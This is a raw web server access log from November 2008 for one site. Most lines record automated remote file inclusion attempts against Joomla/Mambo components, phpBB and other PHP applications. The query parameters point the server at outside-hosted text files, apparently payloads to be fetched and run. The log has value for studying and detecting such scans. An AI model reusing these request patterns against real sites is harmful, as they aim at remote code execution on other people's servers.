80.13.217.217 - - [04/Nov/2008:11:06:19 -0800] "GET /logs/access_080612.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/scannersspreads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.239.45.184 - - [04/Nov/2008:11:06:27 -0800] "GET /logs/access_080403.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geeklinuxer.co.cc/data/Gang11/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.78.216.197 - - [04/Nov/2008:11:06:36 -0800] "GET /logs/access_080117.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
82.78.216.197 - - [04/Nov/2008:11:06:40 -0800] "GET /logs/access_080117.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
82.78.216.197 - - [04/Nov/2008:11:07:05 -0800] "GET /logs/access_080321.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
82.78.216.197 - - [04/Nov/2008:11:07:09 -0800] "GET /logs/access_080321.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:11:08:09 -0800] "GET /administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.151.18.250 - - [04/Nov/2008:11:08:25 -0800] "GET /administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=http://www.nkaujhmongcentral.net/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.151.18.250 - - [04/Nov/2008:11:09:02 -0800] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.nkaujhmongcentral.net/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.151.18.250 - - [04/Nov/2008:11:09:43 -0800] "GET /administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.nkaujhmongcentral.net/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:11:10:02 -0800] "GET /logs/access_080831.log/inc.php?inc=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:11:10:02 -0800] "GET /inc.php?inc=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:11:10:03 -0800] "GET /logs/inc.php?inc=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:11:10:09 -0800] "GET /logs/access_080831.log/index1.php?inc=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:11:10:09 -0800] "GET /index1.php?inc=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:11:10:10 -0800] "GET /logs/index1.php?inc=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:11:10:18 -0800] "GET /logs/access_080827.log/inc.php?inc=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:11:10:23 -0800] "GET /logs/access_080831.log/inc.php?inc=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:11:10:24 -0800] "GET /logs/inc.php?inc=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:11:10:24 -0800] "GET /inc.php?inc=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:11:10:26 -0800] "GET /logs/access_080827.log/index1.php?inc=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:11:10:34 -0800] "GET /logs/access_081020.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:11:10:34 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:11:10:34 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:11:10:42 -0800] "GET /logs/access_080827.log/inc.php?inc=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:11:10:50 -0800] "GET /index1.php?inc=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:11:10:50 -0800] "GET /logs/access_080831.log/index1.php?inc=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:11:10:50 -0800] "GET /logs/index1.php?inc=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:11:10:55 -0800] "GET /logs/access_080831.log/index1.php?inc=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:11:10:55 -0800] "GET /index1.php?inc=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:11:10:56 -0800] "GET /logs/index1.php?inc=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:11:11:04 -0800] "GET /logs/access_080827.log/index1.php?inc=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
77.105.16.220 - - [04/Nov/2008:11:11:09 -0800] "GET /logs/access_080309.log HTTP/1.1" 200 786432 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:11:11:09 -0800] "GET /logs/access_080827.log/index1.php?inc=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:11:11:20 -0800] "GET /logs/access_081026.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
77.105.16.220 - - [04/Nov/2008:11:11:24 -0800] "GET /logs/access_080309.log HTTP/1.1" 200 786432 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:11:11:26 -0800] "GET /logs/access_081018.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
77.105.16.220 - - [04/Nov/2008:11:11:35 -0800] "GET /logs/access_080309.log HTTP/1.1" 200 851968 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
77.105.16.220 - - [04/Nov/2008:11:11:59 -0800] "GET /logs/access_080309.log HTTP/1.1" 200 983040 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
82.78.216.197 - - [04/Nov/2008:11:12:01 -0800] "GET /logs/access_080810.log%20%20/index.php?kobr=http://www.mahbaran.com/load/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.78.216.197 - - [04/Nov/2008:11:12:01 -0800] "GET /logs/index.php?kobr=http://www.mahbaran.com/load/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:11:12:01 -0800] "GET /logs/access_080117.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
82.78.216.197 - - [04/Nov/2008:11:12:02 -0800] "GET /logs/index.php?kobr=http://www.mahbaran.com/load/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.78.216.197 - - [04/Nov/2008:11:12:02 -0800] "GET /logs/access_080810.log%20%20/index.php?kobr=http://www.mahbaran.com/load/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.105.16.220 - - [04/Nov/2008:11:12:14 -0800] "GET /logs/access_080309.log HTTP/1.1" 200 851968 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
77.105.16.220 - - [04/Nov/2008:11:12:31 -0800] "GET /logs/access_080309.log HTTP/1.1" 200 851968 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
77.221.159.100 - - [04/Nov/2008:11:12:37 -0800] "GET /logs/access_080316.log//index.php?option=com_frontpage&task=§ionid=&id=&mosConfig_absolute_path=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.159.100 - - [04/Nov/2008:11:12:37 -0800] "GET /logs//index.php?option=com_frontpage&task=§ionid=&id=&mosConfig_absolute_path=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:11:12:37 -0800] "GET /logs/access_080321.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
77.105.16.220 - - [04/Nov/2008:11:12:42 -0800] "GET /logs/access_080309.log HTTP/1.1" 200 851968 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:11:12:43 -0800] "GET /logs/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:11:12:43 -0800] "GET /administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.159.100 - - [04/Nov/2008:11:12:44 -0800] "GET /index.php?option=com_frontpage&task=§ionid=&id=&mosConfig_absolute_path=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 200 95250 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.154.1 - - [04/Nov/2008:11:12:56 -0800] "GET /logs/access_080811.log//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
124.0.154.1 - - [04/Nov/2008:11:12:56 -0800] "GET /logs/access_080811.log//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
124.0.154.1 - - [04/Nov/2008:11:12:56 -0800] "GET /logs/access_080811.log//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
124.0.154.1 - - [04/Nov/2008:11:12:56 -0800] "GET /logs/access_080811.log//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
124.0.154.1 - - [04/Nov/2008:11:12:56 -0800] "GET /logs/access_080811.log//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
124.0.154.1 - - [04/Nov/2008:11:12:56 -0800] "GET /logs/access_080811.log//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
124.0.154.1 - - [04/Nov/2008:11:12:56 -0800] "GET /administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
124.0.154.1 - - [04/Nov/2008:11:12:56 -0800] "GET /administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
124.0.154.1 - - [04/Nov/2008:11:12:56 -0800] "GET /administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
124.0.154.1 - - [04/Nov/2008:11:12:56 -0800] "GET /administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
124.0.154.1 - - [04/Nov/2008:11:12:56 -0800] "GET /administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
124.0.154.1 - - [04/Nov/2008:11:12:56 -0800] "GET /administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
124.0.154.1 - - [04/Nov/2008:11:12:56 -0800] "GET /logs//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
124.0.154.1 - - [04/Nov/2008:11:12:56 -0800] "GET /logs//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
124.0.154.1 - - [04/Nov/2008:11:12:56 -0800] "GET /logs//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
124.0.154.1 - - [04/Nov/2008:11:12:56 -0800] "GET /logs//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
124.0.154.1 - - [04/Nov/2008:11:12:56 -0800] "GET /logs//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
124.0.154.1 - - [04/Nov/2008:11:12:56 -0800] "GET /logs//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.105.16.220 - - [04/Nov/2008:11:12:58 -0800] "GET /logs/access_080309.log HTTP/1.1" 200 851968 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
82.78.216.197 - - [04/Nov/2008:11:12:59 -0800] "GET /logs/access_080810.log/index.php?kobr=http://www.mahbaran.com/load/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.78.216.197 - - [04/Nov/2008:11:12:59 -0800] "GET /logs/access_080810.log/index.php?kobr=http://www.mahbaran.com/load/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.105.16.220 - - [04/Nov/2008:11:13:16 -0800] "GET /logs/access_080309.log HTTP/1.1" 200 983040 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
77.105.16.220 - - [04/Nov/2008:11:13:38 -0800] "GET /logs/access_080309.log HTTP/1.1" 200 1114112 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
77.105.16.220 - - [04/Nov/2008:11:14:00 -0800] "GET /logs/access_080309.log HTTP/1.1" 200 1179648 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
69.94.56.6 - - [04/Nov/2008:11:14:04 -0800] "GET /logs/access_080925.log/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
77.105.16.220 - - [04/Nov/2008:11:14:25 -0800] "GET /logs/access_080309.log HTTP/1.1" 200 1441792 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:11:14:42 -0800] "GET /logs/access_080117.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
213.251.177.84 - - [04/Nov/2008:11:15:19 -0800] "GET /logs/access_080927.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.lsd.hu/uploads/qATcxfJrqynXqTqlsmbO/content? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.105.16.220 - - [04/Nov/2008:11:15:25 -0800] "GET /logs/access_080309.log HTTP/1.1" 200 1833710 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
124.0.210.117 - - [04/Nov/2008:11:15:27 -0800] "GET /logs/access_080811.log//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.0.210.117 - - [04/Nov/2008:11:15:27 -0800] "GET /administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.0.210.117 - - [04/Nov/2008:11:15:28 -0800] "GET /logs//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.223.228.3 - - [04/Nov/2008:11:15:53 -0800] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://severin.clan.su/tom/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.192.194 - - [04/Nov/2008:11:16:15 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
70.85.192.194 - - [04/Nov/2008:11:16:15 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
70.85.192.194 - - [04/Nov/2008:11:16:15 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
65.55.211.30 - - [04/Nov/2008:11:16:21 -0800] "GET /presto/?M=D HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
193.53.23.32 - - [04/Nov/2008:11:16:26 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jsparix.nuxit.net//components/com_zoom/classes/iptc/hack-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.85.192.194 - - [04/Nov/2008:11:16:36 -0800] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.36.231.160 - - [04/Nov/2008:11:16:36 -0800] "GET /logs/access_080321.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
91.186.3.220 - - [04/Nov/2008:11:17:11 -0800] "GET /logs/access_080920.log%20/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kukesii.t35.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
193.53.23.32 - - [04/Nov/2008:11:17:36 -0800] "GET /logs/access_080329.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jsparix.nuxit.net//components/com_zoom/classes/iptc/hack-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.53.23.32 - - [04/Nov/2008:11:17:36 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jsparix.nuxit.net//components/com_zoom/classes/iptc/hack-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.53.23.32 - - [04/Nov/2008:11:17:37 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jsparix.nuxit.net//components/com_zoom/classes/iptc/hack-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.18.252 - - [04/Nov/2008:11:18:31 -0800] "GET /logs/access_070929.log HTTP/1.0" 200 98605 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.53.23.32 - - [04/Nov/2008:11:18:33 -0800] "GET /logs/access_080719.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://jsparix.nuxit.net//components/com_zoom/classes/iptc/hack-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.222.4.51 - - [04/Nov/2008:11:18:40 -0800] "GET /index.php?p=http://dld.go.th/info.txt? HTTP/1.1" 200 94534 "-" "libwww-perl/5.803" "www.dmulk.com"
70.85.192.194 - - [04/Nov/2008:11:19:01 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
70.85.192.194 - - [04/Nov/2008:11:19:01 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
